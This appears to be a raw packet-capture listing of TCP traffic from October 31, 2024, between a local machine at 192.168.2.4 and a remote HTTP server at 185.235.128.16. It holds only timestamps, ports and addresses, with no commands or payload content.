                                                                                                                                            Oct 31, 2024 17:12:23.449695110 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449703932 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.449719906 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.449724913 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449739933 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.449742079 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449754953 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.449769020 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449771881 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.449775934 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449796915 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.449812889 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450361967 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450377941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450392008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450407028 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450423002 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450423956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450445890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450457096 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450736046 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450756073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450777054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450802088 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.450829983 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450841904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.450875044 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562107086 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562141895 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562159061 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562207937 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562247038 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562289000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562308073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562323093 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562330961 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562340021 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562360048 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562382936 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562568903 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562583923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562597990 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562609911 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562613964 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562627077 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562644958 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562645912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562660933 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562664032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562680006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562681913 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562691927 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562696934 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562711954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562715054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562727928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.562732935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562752008 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.562763929 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563515902 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563532114 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563545942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563556910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563560009 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563569069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563576937 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563591957 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563592911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563600063 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563607931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563618898 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563625097 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563641071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563654900 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563659906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563667059 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563671112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563673019 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563689947 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.563705921 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.563731909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564439058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564455032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564467907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564482927 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564491987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564497948 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564513922 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564529896 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564532995 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564547062 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564559937 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564563036 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564578056 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564579010 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564594030 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564609051 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564609051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.564634085 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.564652920 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565376043 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565392017 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565406084 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565423965 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565428019 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565433979 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565444946 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565460920 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565462112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565479994 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565484047 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565488100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565502882 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565505028 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565505028 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565520048 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565535069 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.565543890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565562010 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.565591097 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566282034 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566298962 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566310883 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566320896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566327095 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566342115 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566344023 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566349983 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566359043 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566370010 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566375971 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566386938 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566390991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566405058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566407919 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566420078 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566426992 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566432953 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566448927 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566451073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566451073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566463947 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566463947 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566479921 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566487074 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566494942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.566514015 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.566529989 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567213058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567229033 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567241907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567260027 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567295074 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567297935 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567321062 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567337990 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567342043 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567353964 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567368031 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567369938 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567378998 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567385912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567399979 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567401886 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567414999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567424059 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567430019 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567445040 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.567454100 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567476034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.567500114 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.568039894 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.568056107 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.568072081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.568087101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.568094015 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.568108082 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.568145990 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679147005 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679212093 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679227114 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679251909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679299116 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679299116 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679351091 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679390907 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679573059 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679620981 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679651022 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679666042 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679681063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679693937 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679708004 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679729939 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679936886 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679951906 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679968119 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679977894 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.679984093 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.679994106 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680000067 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680013895 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680016041 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680025101 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680032015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680053949 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680064917 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680077076 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680489063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680504084 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680519104 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680531025 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680533886 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680550098 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680552959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680561066 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680566072 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680577040 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680586100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.680598021 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680608988 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.680641890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681020975 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681035995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681051016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681066036 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681081057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681088924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681088924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681088924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681097984 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681107044 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681139946 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681139946 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681463957 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681480885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681503057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681510925 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681518078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681519985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681541920 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681554079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681562901 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681569099 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681582928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681591034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681598902 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681610107 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681627989 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681631088 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681641102 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681664944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681669950 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681680918 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681694984 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681703091 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681710005 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.681715012 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681727886 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.681746960 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682455063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682471037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682486057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682496071 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682501078 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682514906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682518959 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682531118 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682537079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682552099 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682554007 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682563066 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682569981 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682584047 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682585001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682600021 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682600021 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682610989 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682616949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682629108 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682632923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.682646990 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682657003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.682677984 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.683960915 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.683976889 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.683990955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684006929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684007883 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684020042 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684029102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684031010 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684045076 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684051991 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684058905 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684062004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684077978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684081078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684092999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684102058 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684108973 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684117079 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684123993 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684125900 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:23.684139967 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:23.684151888 CET4975480192.168.2.4185.235.128.16
